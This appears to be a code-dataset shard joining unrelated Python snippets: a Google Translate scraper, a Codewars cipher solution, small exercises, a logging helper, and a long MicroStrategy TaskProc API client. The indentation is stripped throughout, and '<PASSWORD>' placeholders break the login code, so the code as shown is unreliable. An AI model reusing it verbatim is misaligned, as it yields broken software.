'User-Agent': "Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.1;SV1;.NET CLR 1.1.4322;.NET CLR 2.0.50727;.NET CLR 3.0.04506.30)"}
def translate(to_translate, to_language="auto", from_language="auto"):
base_link = f"http://translate.google.com/m?tl={to_language}&sl={from_language}&q={to_translate}"
request = requests.get(base_link, headers=agent)
expr = r'(?s)class="(?:t0|result-container)">(.*?)<'
re_result = re.findall(expr, request.text)
if (len(re_result) == 0):
result = ""
else:
result = re_result[0]
return (result)
| StarcoderdataPython |
1731099 | <gh_stars>0
from .account import AccountView
from .meta import MetaView
from .structures import StructuresView
| StarcoderdataPython |
3381926 | <reponame>mwk0408/codewars_solutions
from functools import reduce
def nico(key, message):
temp=[[] for i in range(len(key))]
for i in range(len(message)):
temp[i%len(key)].append(message[i])
maxlen=len(temp[0])
dict={}
for i in range(len(temp)):
dict[key[i]]=temp[i]
res=sorted(dict.items(), key=lambda x:(ord(x[0])))
for i in range(len(res)):
res[i]=list(res[i])
res[i].pop(0)
res[i]=reduce(lambda x : x, res[i])
if len(res[i])<maxlen:
res[i]+=[" "]
elif not res[i]:
res[i]=[" "]
string=""
for j in range(len(res[0])):
for i in range(len(res)):
string+=res[i][j]
return string | StarcoderdataPython |
1756932 | <gh_stars>1-10
_ = input()
a = set(input().split())
_=input()
b = set(input().split())
print(len(a.difference(b)))
| StarcoderdataPython |
3301049 | #!/usr/bin/env
# -*- coding: utf-8 -*-
import config
"""
This function prints log message on console along with the Tag string
@param log_type - Tag string ("ERROR", "TEST", "INFO").
@param log_msg - log message to print.
"""
def LOG ( log_type, log_msg ):
if log_type == "TEST":
print ("["+log_type+"] " + log_msg)
elif not config.TEST_MODE == True:
print ("["+log_type+"] log_parser: " + log_msg)
# End of file
| StarcoderdataPython |
3205889 | <gh_stars>0
__all__ = ['biobrain', 'utils']
| StarcoderdataPython |
1717299 | <gh_stars>1-10
from src.message_listener import MessageListener
from src.message_type import MessageType
class MessageSender:
def __init__(self):
self.message_listeners = []
def register_message_listener(self, message_listener: MessageListener):
self.message_listeners.append(message_listener)
def notify_all_message_listeners(self, message: str, message_type: MessageType):
for message_listener in self.message_listeners:
message_listener.notify(message, message_type)
| StarcoderdataPython |
1758354 | <filename>microstrategy_api/task_proc/task_proc.py<gh_stars>0
import re
import urllib.parse
import warnings
from enum import Enum
import time
from fnmatch import fnmatch
from typing import Optional, List, Set, Union
import requests
import logging
from bs4 import BeautifulSoup
from microstrategy_api.task_proc.document import Document
from microstrategy_api.task_proc.privilege_types import PrivilegeTypes, PrivilegeTypesIDDict
from microstrategy_api.task_proc.report import Report
from microstrategy_api.task_proc.attribute import Attribute
from microstrategy_api.task_proc.bit_set import BitSet
from microstrategy_api.task_proc.exceptions import MstrClientException
from microstrategy_api.task_proc.executable_base import ExecutableBase
from microstrategy_api.task_proc.object_type import ObjectType, ObjectTypeIDDict, ObjectSubTypeIDDict, ObjectSubType
BASE_PARAMS = {'taskEnv': 'xml', 'taskContentType': 'xml'}
class TaskProc(object):
"""
Class encapsulating base logic for the MicroStrategy Task Proc API
"""
def __init__(self,
base_url,
username=None,
password=<PASSWORD>,
server=None,
project_source=None, # deprecated
project_name=None,
session_state=None,
concurrent_max=5,
max_retries=3,
retry_delay=2,
):
"""
Initialize the MstrClient by logging in and retrieving a session.
Arguments
----------
base_url (str):
base url of form http://hostname/MicroStrategy/asp/TaskProc.aspx
username (str):
username for project
password (str):
<PASSWORD>
server (str):
The machine name (or IP) of the MicroStrategy Intelligence Server to connect to.
project_name (str):
The name of the MicroStrategy project to connect to.
"""
self.log = logging.getLogger("{mod}.{cls}".format(mod=self.__class__.__module__, cls=self.__class__.__name__))
if 'TaskProc' in base_url:
if base_url[-1] != '?':
base_url += '?'
self._base_url = base_url
self.cookies = None
self.trace = False
self.retry_delay = retry_delay
self.max_retries = max_retries
self.concurrent_max = concurrent_max
self.server = server
self.project_name = project_name
self.username = username
self.password = password
self.__messages_to_retry_list = None
if session_state is None:
if project_source is not None:
warnings.warn('project_source parameter is deprecated, use server parameter instead')
if self.server is None:
self.server = project_source
else:
warnings.warn('both project_source deprecated param and server parameter provided!'
' server parameter value used')
else:
if self.server is None:
raise ValueError('Neither server nor project_source (deprecated) parameter provided!')
if self.username is not None:
self.login()
else:
self.login_guest()
else:
self._session = session_state
def __str__(self):
return 'MstrClient session: {}'.format(self._session)
@property
def _messages_to_retry(self):
if self.__messages_to_retry_list is None:
regex_list = \
[
'There are too many auditor handles at the moment. Please try again later.',
'There is possible deadlock. Please try to run the report later.',
'Failed to create job.',
'.* Number of jobs has exceeded maximum for project .*',
'Maximum number of executing jobs exceeded .*',
]
self.__messages_to_retry_list = [re.compile(pattern) for pattern in regex_list]
return self.__messages_to_retry_list
@property
def base_url(self):
return self._base_url
def login(self,
server: str=None,
project_name: str=None,
username: str=None,
password: str=None,
):
"""
Login to taskproc API
Arguments
----------
server (str):
The machine name (or IP) of the MicroStrategy Intelligence Server to connect to.
project_name (str):
The name of the MicroStrategy project to connect to.
username (str):
username for project
password (str):
password for project
"""
if server:
self.server = server
if project_name:
self.project_name = project_name
if username:
self.username = username
if password:
self.password = password
# getSessionState is used instead of login because we can set the rws parameter that way.
# arguments = {
# 'taskId': 'login',
# 'server': self.server,
# 'project': self.project_name,
# 'userid': self.username,
# 'password': <PASSWORD>
# }
arguments = {
'taskId': 'getSessionState',
'server': self.server,
'project': self.project_name,
'uid': self.username,
'pwd': <PASSWORD>,
'rws': self.concurrent_max,
}
self.log.debug("logging in.")
response = self.request(arguments)
if self.trace:
self.log.debug("logging in returned %s" % response)
# self._session_state = response.find('sessionState')
self._session = response.find('max-state').string
def login_guest(self,
server: str=None,
project_name: str=None,
):
"""
Login to taskproc API
Arguments
----------
server (str):
The machine name (or IP) of the MicroStrategy Intelligence Server to connect to.
project_name (str):
The name of the MicroStrategy project to connect to.
"""
if server:
self.server = server
if project_name:
self.project_name = project_name
arguments = {
'taskId': 'getSessionState',
'server': self.server,
'project': self.project_name,
'authMode': 8,
'rws': self.concurrent_max,
}
self.log.debug("logging in as guest")
response = self.request(arguments)
if self.trace:
self.log.debug("logging in returned %s" % response)
# self._session_state = response.find('sessionState')
self._session = response.find('max-state').string
@property
def session(self):
return self._session
class SystemFolders(Enum): # EnumDSSXMLFolderNames
"""
This interface defines the enumeration constants used to specify the folder names internally defined in MicroStrategy 7.
"""
PublicObjects = 1 # DssXmlFolderNamePublicObjects Specifies the folder "Public Objects".
PublicConsolidations = 2 # DssXmlFolderNamePublicConsolidations Specifies the folder "Consolidations" under the folder "Public Objects".
PublicCustomGroups = 3 # DssXmlFolderNamePublicCustomGroups Specifies the folder "Custom Groups" under the folder "Public Objects".
PublicFilters = 4 # DssXmlFolderNamePublicFilters Specifies the folder "Filters" under the folder "Public Objects".
PublicMetrics = 5 # DssXmlFolderNamePublicMetrics Specifies the folder "Metrics" under the folder "Public Objects".
PublicPrompts = 6 # DssXmlFolderNamePublicPrompts Specifies the folder "Prompts" under the folder "Public Objects".
PublicReports = 7 # DssXmlFolderNamePublicReports Specifies the folder "Reports" under the folder "Public Objects".
PublicSearches = 8 # DssXmlFolderNamePublicSearches Specifies the folder "Searches" under the folder "Public Objects".
PublicTemplates = 9 # DssXmlFolderNamePublicTemplates Specifies the folder "Templates" under the folder "Public Objects".
TemplateObjects = 10 # DssXmlFolderNameTemplateObjects Specifies the folder "Template Objects".
TemplateConsolidations = 11 # DssXmlFolderNameTemplateConsolidations Specifies the folder "Consolidations" under the folder "Template Objects".
TemplateCustomGroups = 12 # DssXmlFolderNameTemplateCustomGroups Specifies the folder "Custom Groups" under the folder "Template Objects".
TemplateFilters = 13 # DssXmlFolderNameTemplateFilters Specifies the folder "Filters" under the folder "Template Objects".
TemplateMetrics = 14 # DssXmlFolderNameTemplateMetrics Specifies the folder "Metrics" under the folder "Template Objects".
TemplatePrompts = 15 # DssXmlFolderNameTemplatePrompts Specifies the folder "Prompts" under the folder "Template Objects".
TemplateReports = 16 # DssXmlFolderNameTemplateReports Specifies the folder "Reports" under the folder "Template Objects".
TemplateSearches = 17 # DssXmlFolderNameTemplateSearches Specifies the folder "Searches" under the folder "Template Objects".
TemplateTemplates = 18 # DssXmlFolderNameTemplateTemplates Specifies the folder "Templates" under the folder "Template Objects".
ProfileObjects = 19 # DssXmlFolderNameProfileObjects Specifies the folder "Profile" of a user.
ProfileReports = 20 # DssXmlFolderNameProfileReports Specifies the folder "Reports" under the folder "Profile" of a user.
ProfileAnswers = 21 # DssXmlFolderNameProfileAnswers Specifies the folder "Answers" under the folder "Profile" of a user.
ProfileFavorites = 22 # DssXmlFolderNameProfileFavorites Specifies the folder "Favorites" under the folder "Profile" of a user.
ProfileOther = 23 # DssXmlFolderNameProfileOther Specifies the folder "Other" under the folder "Profile" of a user.
SchemaObjects = 24 # DssXmlFolderNameSchemaObjects Specifies the folder "Schema Objects".
SchemaAttributeForms = 25 # DssXmlFolderNameSchemaAttributeForms Specifies the folder "Attribute Forms" under the folder "Schema Objects".
SchemaAttributes = 26 # DssXmlFolderNameSchemaAttributes Specifies the folder "Attributes" under the folder "Schema Objects".
SchemaColumns = 27 # DssXmlFolderNameSchemaColumns Specifies the folder "Columns" under the folder "Schema Objects".
SchemaDataExplorer = 28 # DssXmlFolderNameSchemaDataExplorer Specifies the folder "Data Explorer" under the folder "Schema Objects".
SchemaFacts = 29 # DssXmlFolderNameSchemaFacts Specifies the folder "Facts" under the folder "Schema Objects".
SchemaFunctions = 30 # DssXmlFolderNameSchemaFunctions Specifies the folder "Functions" under the folder "Schema Objects".
SchemaHierarchies = 31 # DssXmlFolderNameSchemaHierarchies Specifies the folder "Hierarchies" under the folder "Schema Objects".
SchemaPartitionFilters = 32 # DssXmlFolderNameSchemaPartitionFilters Specifies the folder "Partition Filters" under the folder "Schema Objects".
SchemaPartitionMappings = 33 # DssXmlFolderNameSchemaPartitionMappings Specifies the folder "Partition Mappings" under the folder "Schema Objects".
SchemaSubtotals = 34 # DssXmlFolderNameSchemaSubtotals Specifies the folder"Subtotals" under the folder "Schema Objects".
SchemaTables = 35 # DssXmlFolderNameSchemaTables Specifies the folder "Tables" under the folder "Schema Objects".
SchemaWarehouseTables = 36 # DssXmlFolderNameSchemaWarehouseTables Specifies the folder "Warehouse Tables" under the folder "Schema Objects".
SchemaTransformationAttributes = 37 # DssXmlFolderNameSchemaTransformationAttributes Specifies the folder "Transformation Attributes" under the folder "Schema Objects".
SchemaTransformations = 38 # DssXmlFolderNameSchemaTransformations Specifies the folder "Transformations" under the folder "Schema Objects".
Root = 39 # DssXmlFolderNameRoot Specifies the root folder of the project.
SchemaFunctionsNested = 40 # DssXmlFolderNameSchemaFunctionsNested Specifies the "Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaBasicFunctions = 41 # DssXmlFolderNameSchemaBasicFunctions Specifies the "Basic Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaDateAndTimeFunctions = 42 # DssXmlFolderNameSchemaDateAndTimeFunctions Specifies the "Date and Time Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaInternalFunctions = 43 # DssXmlFolderNameSchemaInternalFunctions Specifies the "Internal Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaNullZeroFunctions = 44 # DssXmlFolderNameSchemaNullZeroFunctions Specifies the "Null/Zero Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaOlapFunctions = 45 # DssXmlFolderNameSchemaOlapFunctions Specifies the "OLAP Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaRankAndNTileFunctions = 46 # DssXmlFolderNameSchemaRankAndNTileFunctions Specifies the "Rank and NTile Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaStringFunctions = 47 # DssXmlFolderNameSchemaStringFunctions Specifies the "String Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaOperators = 48 # DssXmlFolderNameSchemaOperators Specifies the "Operators" folder nested several levels deep in the "Schema Objects" folder.
SchemaArithmeticOperators = 49 # DssXmlFolderNameSchemaArithmeticOperators Specifies the "Arithmetic Operators" folder nested several levels deep in the "Schema Objects" folder.
SchemaComparisonOperators = 50 # DssXmlFolderNameSchemaComparisonOperators Specifies the "Comparison Operators" folder nested several levels deep in the "Schema Objects" folder.
SchemaComparisonForRankOperators = 51 # DssXmlFolderNameSchemaComparisonForRankOperators Specifies the "Comparison Operators for Rank" folder nested several levels deep in the "Schema Objects" folder.
SchemaLogicalOperators = 52 # DssXmlFolderNameSchemaLogicalOperators Specifies the "Logical Operators" folder nested several levels deep in the "Schema Objects" folder.
SchemaPlugInPackages = 53 # DssXmlFolderNameSchemaPlugInPackages Specifies the "Plug-In Packages" folder nested several levels deep in the "Schema Objects" folder.
SchemaFinancialFunctions = 54 # DssXmlFolderNameSchemaFinancialFunctions Specifies the "Financial Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaMathFunctions = 55 # DssXmlFolderNameSchemaMathFunctions Specifies the "Math Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaStatisticalFunctions = 56 # DssXmlFolderNameSchemaStatisticalFunctions Specifies the "Statistical Functions" folder nested several levels deep in the "Schema Objects" folder.
AutoStyles = 57 # DssXmlFolderNameAutoStyles Specifies the "AutoStyles" folder in the "Public Objects" folder.
ConfigureMonitors = 58 # DssXmlFolderNameConfigureMonitors Specifies the "Monitors" folder in the Configuration.
ConfigureServerDefs = 59 # DssXmlFolderNameConfigureServerDefs Specifies the "Server Definitions" folder in the Configuration.
TemplateDocuments = 60 # DssXmlFolderNameTemplateDocuments Specifies the "Template Documents" folder.
SystemObjects = 61 # DssXmlFolderNameSystemObjects Specifies the "System Objects" folder.
SystemLinks = 62 # DssXmlFolderNameSystemLinks Specifies the "System Links" folder.
SystemPropertySets = 63 # DssXmlFolderNameSystemPropertySets Specifies the "System Property sets" folder.
SystemParserFolder = 64 # DssXmlFolderNameSystemParserFolder Specifies the "System Parser" folder.
SystemSchemaFolder = 65 # DssXmlFolderNameSystemSchemaFolder Specifies the "System Schema" folder.
SystemWarehouseCatalog = 66 # DssXmlFolderNameSystemWarehouseCatalog Specifies the "System Warehouse catalog" folder.
SystemSystemHierarchy = 67 # DssXmlFolderNameSystemSystemHierarchy Specifies the "System Hierarchy" folder.
SystemDrillMap = 68 # DssXmlFolderNameSystemDrillMap Specifies the "System Drill Map" folder.
SystemMDSecurityFilters = 69 # DssXmlFolderNameSystemMDSecurityFilters Specifies the "System MD Security Filters" folder.
SystemDummyPartitionTables = 70 # DssXmlFolderNameSystemDummyPartitionTables Specifies the "System Dummy Partition Tables" folder.
SystemSystemPrompts = 71 # DssXmlFolderNameSystemSystemPrompts Specifies the "System Prompts" folder.
Events = 72 # DssXmlFolderNameEvents None
ConfigureDBRoles = 73 # DssXmlFolderNameConfigureDBRoles None
Locales = 74 # DssXmlFolderNameLocales None
PropertySets = 75 # DssXmlFolderNamePropertySets Specifies the folder where Property Sets are stored
DBMS = 76 # DssXmlFolderNameDBMS None
Projects = 77 # DssXmlFolderNameProjects Specifies the folder where Projects are stored
Users = 78 # DssXmlFolderNameUsers Specifies the folder where Users are stored
UserGroups = 79 # DssXmlFolderNameUserGroups Specifies the folder where User Groups are stored
SecurityRoles = 80 # DssXmlFolderNameSecurityRoles Specifies the folder where Security Roles are stored
DBConnections = 81 # DssXmlFolderNameDBConnections None
DBLogins = 82 # DssXmlFolderNameDBLogins None
Links = 83 # DssXmlFolderNameLinks Specifies the folder where Links are stored
ScheduleObjects = 84 # DssXmlFolderNameScheduleObjects Specifies the folder where Schedules are stored
ScheduleTriggers = 85 # DssXmlFolderNameScheduleTriggers Specifies the folder where Schedule Triggers are stored
TableSources = 86 # DssXmlFolderNameTableSources None
VersionUpdateHistory = 87 # DssXmlFolderNameVersionUpdateHistory Specifies the folder where the Version Update History is stored
Devices = 88 # DssXmlFolderNameDevices Specifies the folder where Devices are stored
Transmitters = 89 # DssXmlFolderNameTransmitters Specifies the folder where Transmitters are stored
TemplateDashboards = 90 # DssXmlFolderNameTemplateDashboards Specifies the folder where Template Dashboards are stored
SystemDimension = 91 # DssXmlFolderNameSystemDimension Specifies the DSS ID of the system dimension object
ProfileSegments = 92 # DssXmlFolderNameProfileSegments None
TemplateAnalysis = 93 # DssXmlFolderNameTemplateAnalysis Specifies "Analysis" folder under "Template Objects"
Palettes = 94 # DssXmlFolderNamePalettes Palettes folder
Themes = 95 # DssXmlFolderNameThemes Themes folder
MyDossiers = 96 # DssXmlFolderNameMyDossiers Personal Dossiers folder
MySharedDossiers = 97 # DssXmlFolderNameMySharedDossiers Shared Dossiers folder
Maximum = 98 # DssXmlFolderNameMaximum Acts as a current maximum value. This should only be used as its symbolic name, not a hardcoded enumeration value, because it may change as more folder names are added.
BlackListed = 1000 # DssXmlFolderNameBlackListed Special value that will allow black listed folders to be treated uniquely
class FolderSortOrder(Enum):
# https://lw.microstrategy.com/msdz/MSDL/GARelease_Current/docs/ReferenceFiles/reference/com/microstrategy/web/objects/EnumWebObjectSort.html
ModificationTime = 7
NoSort = -1
ObjectDescription = 3
ObjectName = 2
ObjectNameFoldersFirst = 6
ObjectOwner = 4
ObjectType = 1
ObjectTypeDisplayOrder = 5
class FolderObject(object):
def __init__(self, guid, name, path, description, object_type, object_subtype):
self.guid = guid
self.name = name
self.path = path
self.description = description
self.contents = None
try:
object_type = int(object_type)
if object_type in ObjectTypeIDDict:
object_type = ObjectTypeIDDict[object_type]
except ValueError:
pass
self.object_type = object_type
try:
object_subtype = int(object_subtype)
if object_subtype in ObjectSubTypeIDDict:
object_subtype = ObjectSubTypeIDDict[object_subtype]
except ValueError:
pass
self.object_subtype = object_subtype
def path_str(self):
return '\\' + '\\'.join(self.path)
def full_name(self):
return self.path_str() + '\\' + self.name
def __str__(self) -> str:
return self.full_name()
def __repr__(self) -> str:
return "'{}'\t\t type={} subtype={} guid={}".format(self.full_name(),
self.object_type,
self.object_subtype, self.guid)
def get_folder_contents_by_guid(self,
folder_guid: str=None,
system_folder: Optional[SystemFolders]=None,
type_restriction: Optional[set]=None,
sort_key: Optional[FolderSortOrder]=None,
sort_ascending: Optional[bool]=True,
name_patterns_to_include: Optional[List[str]]=None,
name_patterns_to_exclude: Optional[List[str]]=None,
):
"""Returns a dictionary with folder name, GUID, and description.
Args
----
folder_guid:
guid of folder to list contents.
If not supplied, returns contents of system root folder as specified in system_folder
system_folder:
The numeric ID of the System Folder to inspect. Values correspond to the fields of the
EnumDSSXMLFolderNames interface. If omitted, then the Shared Reports folder ('7') is used.
type_restriction:
A set of the object SubTypes to include in the contents.
sort_key:
How the elements of the folder are sorted. Sort keys are specified as integers, as described
by the EnumWebObjectSort interface. If omitted, then WebObjectSortObjectNameFoldersFirst is used.
sort_ascending:
Sort the results in ascending order, if False, then descending order will be used.
name_patterns_to_include:
A list of file name patterns (using * wildcards) to include. Not case sensitive.
name_patterns_to_exclude:
A list of file name patterns (using * wildcards) to exclude. Not case sensitive.
Returns
-------
list: list of dictionaries with keys id, name, description, and type
as keys
"""
if isinstance(name_patterns_to_include, str):
name_patterns_to_include = [name_patterns_to_include]
if isinstance(name_patterns_to_exclude, str):
name_patterns_to_exclude = [name_patterns_to_exclude]
arguments = {'sessionState': self._session,
'taskID': 'folderBrowse',
'includeObjectDesc': 'true',
'showObjectTags': 'true',
}
if folder_guid:
arguments['folderID'] = folder_guid
if system_folder:
if isinstance(system_folder, TaskProc.SystemFolders):
system_folder = system_folder.value
arguments['systemFolder'] = system_folder
if type_restriction is None:
# Note: Type 776 is added to the defaults to include cubes
type_restriction = '2048,768,769,774,776,14081'
elif not isinstance(type_restriction, str):
type_restriction_codes = set()
# noinspection PyTypeChecker
for type_restriction_val in type_restriction:
if isinstance(type_restriction_val, ObjectSubType):
type_restriction_codes.add(str(type_restriction_val.value))
else:
type_restriction_codes.add(str(type_restriction_val))
type_restriction = ','.join(type_restriction_codes)
arguments['typeRestriction'] = type_restriction
if sort_key:
arguments['sortKey'] = sort_key
if not sort_ascending:
arguments['asc'] = 'false'
try:
response = self.request(arguments)
except MstrClientException as e:
if 'The folder name is unknown to the server.' in e.msg:
raise FileNotFoundError("Folder ID {} not found".format(folder_guid))
else:
raise e
result = []
for folder in response('folders'):
path_list = list()
for seq_num, path_folder in enumerate(folder.path.find_all('folder')):
path_folder_name = path_folder.string
if seq_num == 0 and path_folder_name == 'Shared Reports':
path_list.append('Public Objects')
path_folder_name = 'Reports'
path_list.append(path_folder_name)
folder_name = folder.attrs['name']
if len(path_list) == 0 and folder_name == 'Shared Reports':
path_list.append('Public Objects')
folder_name = 'Reports'
path_list.append(folder_name)
for obj in folder('obj'):
name = obj.find('n').string
if name_patterns_to_include is None:
name_ok = True
else:
name_ok = False
for include_pattern in name_patterns_to_include:
if fnmatch(name.lower(), include_pattern.lower()):
name_ok = True
if name_patterns_to_exclude is not None:
for exclude_pattern in name_patterns_to_exclude:
if fnmatch(name.lower(), exclude_pattern.lower()):
name_ok = False
if name_ok:
obj_inst = TaskProc.FolderObject(
guid=obj.find('id').string,
name=name,
path=path_list,
description=obj.find('d').string,
object_type=obj.find('t').string,
object_subtype=obj.find('st').string,
)
result.append(obj_inst)
return result
@staticmethod
def path_parts(path) -> List[str]:
# MSTR Paths should use \ separators, however, if the paths starts with / we'll try and use that
if len(path) == 0:
return []
elif path[0] == '/':
return re.split('[/\\\]', path)
else:
return re.split('[\\\]', path)
def get_folder_contents_by_name(self,
name: Union[str, List[str]],
type_restriction: Optional[set] = None,
sort_key: Optional[FolderSortOrder] = None,
sort_ascending: Optional[bool] = True,
name_patterns_to_include: Optional[List[str]] = None,
name_patterns_to_exclude: Optional[List[str]] = None,
):
if isinstance(name, str):
name_parts = TaskProc.path_parts(name)
else:
# Blindly assume it's an iterable type
name_parts = name
if isinstance(type_restriction, str):
type_restriction = set(type_restriction.split(','))
folder_contents = []
intermediatefolder_type_restriction = {'2048'}
for folder_name in name_parts:
if folder_name == '':
pass
elif folder_name == 'Public Objects':
folder_contents = self.get_folder_contents_by_guid(system_folder=TaskProc.SystemFolders.PublicObjects,
type_restriction=intermediatefolder_type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
)
else:
found = False
new_folder_contents = None
for sub_folder in folder_contents:
if sub_folder.name == folder_name:
found = True
if sub_folder.object_type == ObjectType.Folder:
# If this is the last folder use the passed type_restriction and name patterns
if folder_name == name_parts[-1]:
new_folder_contents = self.get_folder_contents_by_guid(
folder_guid=sub_folder.guid,
type_restriction=type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
name_patterns_to_include=name_patterns_to_include,
name_patterns_to_exclude=name_patterns_to_exclude,
)
else:
new_folder_contents = self.get_folder_contents_by_guid(
folder_guid=sub_folder.guid,
type_restriction=intermediatefolder_type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
)
else:
new_folder_contents = sub_folder
if not found:
if isinstance(name, str):
msg = f'"{folder_name}" not found when processing path {name}\nParts={name_parts}'
else:
msg = f'"{folder_name}" not found when processing path {name}'
raise FileNotFoundError(msg)
else:
folder_contents = new_folder_contents
return folder_contents
def get_folder_contents(self,
name: Union[str, List[str]],
type_restriction: Optional[set] = None,
sort_key: Optional[FolderSortOrder] = None,
sort_ascending: Optional[bool] = True,
recursive: Optional[bool] = True,
flatten_structure: Optional[bool] = True,
name_patterns_to_include: Optional[List[str]] = None,
name_patterns_to_exclude: Optional[List[str]] = None,
) -> List[FolderObject]:
if type_restriction is not None:
sub_type_restriction = type_restriction.copy()
if recursive:
sub_type_restriction.add(ObjectSubType.Folder)
else:
sub_type_restriction = None
if isinstance(name, str) and len(name) == 32 and '/' not in name and '\\' not in name:
folder_contents = self.get_folder_contents_by_guid(folder_guid=name,
type_restriction=sub_type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
name_patterns_to_include=name_patterns_to_include,
name_patterns_to_exclude=name_patterns_to_exclude,
)
else:
folder_contents = self.get_folder_contents_by_name(name,
type_restriction=sub_type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
name_patterns_to_include=name_patterns_to_include,
name_patterns_to_exclude=name_patterns_to_exclude,
)
if recursive:
for item in folder_contents:
if item.object_type == ObjectType.Folder:
try:
contents = self.get_folder_contents(
name=item.guid,
type_restriction=type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
recursive=recursive,
flatten_structure=flatten_structure,
name_patterns_to_include=name_patterns_to_include,
name_patterns_to_exclude=name_patterns_to_exclude,
)
except FileNotFoundError as e:
contents = e
if flatten_structure:
if isinstance(contents, list):
folder_contents.extend(contents)
else:
item.contents = contents
if flatten_structure:
if type_restriction is not None:
folder_contents = [sub for sub in folder_contents if sub.object_subtype in type_restriction]
return folder_contents
def get_folder_object(self,
name: str,
type_restriction: Optional[set] = None,
) -> FolderObject:
name_parts = TaskProc.path_parts(name)
folder_name = '/'.join(name_parts[:-1])
object_name = name_parts[-1]
folder_contents = self.get_folder_contents(folder_name, type_restriction=type_restriction, name_patterns_to_include=[object_name])
if len(folder_contents) == 0:
raise FileNotFoundError("Folder {} does not contain {} (that matches type {})".format(
folder_name, object_name, type_restriction
))
elif len(folder_contents) > 1:
raise FileNotFoundError("Folder {} does contains multiple matches for {} (that match type {})\n {}".format(
folder_name, object_name, type_restriction, folder_contents,
))
else:
return folder_contents[0]
def get_matching_objects_list(self, path_list: list, type_restriction: set, error_list=None) -> List[FolderObject]:
"""
Get a list of matching FolderObjects based on a list of object name patterns.
Patterns accept wildcards:
- * for any set of characters. Allowed in the object name part of the path but not the folder name part.
- Patterns that end in [r] will match objects in any sub folder. Any non / characters immediately before
the [r] will be considered as an object name pattern to match in all sub folders.
Parameters
----------
path_list:
A list of path patterns
type_restriction:
A set of ObjectSubType values to allow.
error_list:
Option list to return path errors (FileNotFoundError) in. If not passed, then errors are raised.
Returns
-------
A list of matching FolderObject
"""
if isinstance(path_list, str):
path_list = [path_list]
result_list = list()
for path in path_list:
path = path.strip()
try:
if path == '':
pass
elif path[-3:].lower() == '[r]':
# Ends in [r] so recursive search is needed
path_parts = self.path_parts(path)
folder = path_parts[:-1]
file_name = path_parts[-1][:-3]
if file_name == '':
file_name_list = None
else:
file_name_list = [file_name]
contents = self.get_folder_contents(
name=folder,
name_patterns_to_include=file_name_list,
recursive=True,
flatten_structure=True,
type_restriction=type_restriction,
)
if len(contents) == 0:
msg = f"Path pattern {path} returned no matches"
if error_list is not None:
error_list.append(msg)
else:
self.log.warning(msg)
result_list.extend(contents)
else:
# Non recursive pass last part as name_patterns_to_include
path_parts = self.path_parts(path)
contents = self.get_folder_contents(
name=path_parts[:-1],
name_patterns_to_include=[path_parts[-1]],
recursive=False,
flatten_structure=True,
type_restriction=type_restriction,
)
if len(contents) == 0:
self.log.warning("Path pattern {} returned no matches".format(path))
result_list.extend(contents)
except FileNotFoundError as e:
if error_list is None:
raise e
else:
error_list.append(f'{path} yields {e}')
return result_list
def get_executable_object(self, folder_obj: FolderObject) -> ExecutableBase:
# Check based on object type
if folder_obj.object_subtype == ObjectSubType.ReportWritingDocument:
# Document
return Document(self, guid=folder_obj.guid, name=folder_obj.full_name())
elif folder_obj.object_subtype == ObjectSubType.ReportCube:
# Cube
return Report(self, guid=folder_obj.guid, name=folder_obj.full_name())
else:
# Regular report
return Report(self, guid=folder_obj.guid, name=folder_obj.full_name())
def list_elements(self, attribute_id):
"""
Returns the elements associated with the given attribute id.
Note that if the call fails (i.e. MicroStrategy returns an
out of memory stack trace) the returned list is empty
Args:
attribute_id (str): the attribute guid
Returns:
list: a list of strings containing the names for attribute values
"""
arguments = {'taskId': 'browseElements',
'attributeID': attribute_id,
'sessionState': self._session}
response = self.request(arguments)
result = []
for attr in response('block'):
if attr.find('n').string:
result.append(attr.find('n').string)
return result
def check_user_privileges(self, privilege_types: Set[PrivilegeTypes]=None) -> dict:
if privilege_types is None:
privilege_types = {PrivilegeTypes.WebExecuteAnalysis}
arguments = {'taskId': 'checkUserPrivileges',
'privilegeTypes': privilege_types,
'sessionState': self._session}
response = self.request(arguments)
priv_dict = dict()
priv_entries = response.find_all('privilege')
for privilege in priv_entries:
priv = privilege['type']
try:
priv = int(priv)
if priv in PrivilegeTypesIDDict:
priv = PrivilegeTypesIDDict[priv]
except ValueError:
pass
value = privilege['value']
if value == '1':
value = True
elif value == '0':
value = False
else:
raise ValueError("Priv value {} is not valid in {}".format(value, priv_entries))
priv_dict[priv] = value
return priv_dict
def get_user_info(self):
profile_objects = self.get_folder_contents_by_guid(system_folder=TaskProc.SystemFolders.ProfileObjects)
profile_first_object = profile_objects[0]
profile_name = profile_first_object.path[-1]
# For example <NAME> (jadams)
full_name, user_id = profile_name.split('(', 1)
user_id = user_id[:-1]
return full_name, user_id
def get_attribute(self, attribute_id):
"""
Returns the attribute object for the given attribute id.
Args:
attribute_id (str): the attribute guid
Returns:
Attribute: Attribute object for this guid
Raises:
MstrClientException: if no attribute id is supplied
"""
if not attribute_id:
raise MstrClientException("You must provide an attribute id")
arguments = {'taskId': 'getAttributeForms',
'attributeID': attribute_id,
'sessionState': self._session
}
response = self.request(arguments)
return Attribute(response.find('dssid').string, response.find('n').string)
def logout(self):
arguments = {
'taskId': 'logout',
'sessionState': self._session,
}
arguments.update(BASE_PARAMS)
try:
result = self.request(arguments, max_retries=0)
except Exception as e:
result = str(e)
self._session = None
if self.trace:
self.log.debug("logging out returned %s" % result)
def request(self, arguments: dict, max_retries: int = None) -> BeautifulSoup:
"""
Assembles the url and performs a get request to
the MicroStrategy Task Service API
Arumgents
---------
arguments:
Maps get key parameters to values
max_retries:
Optional. Number of retries to allow. Default = 1.
Returns:
The xml response as a BeautifulSoup 4 object.
"""
if max_retries is None:
max_retries = self.max_retries
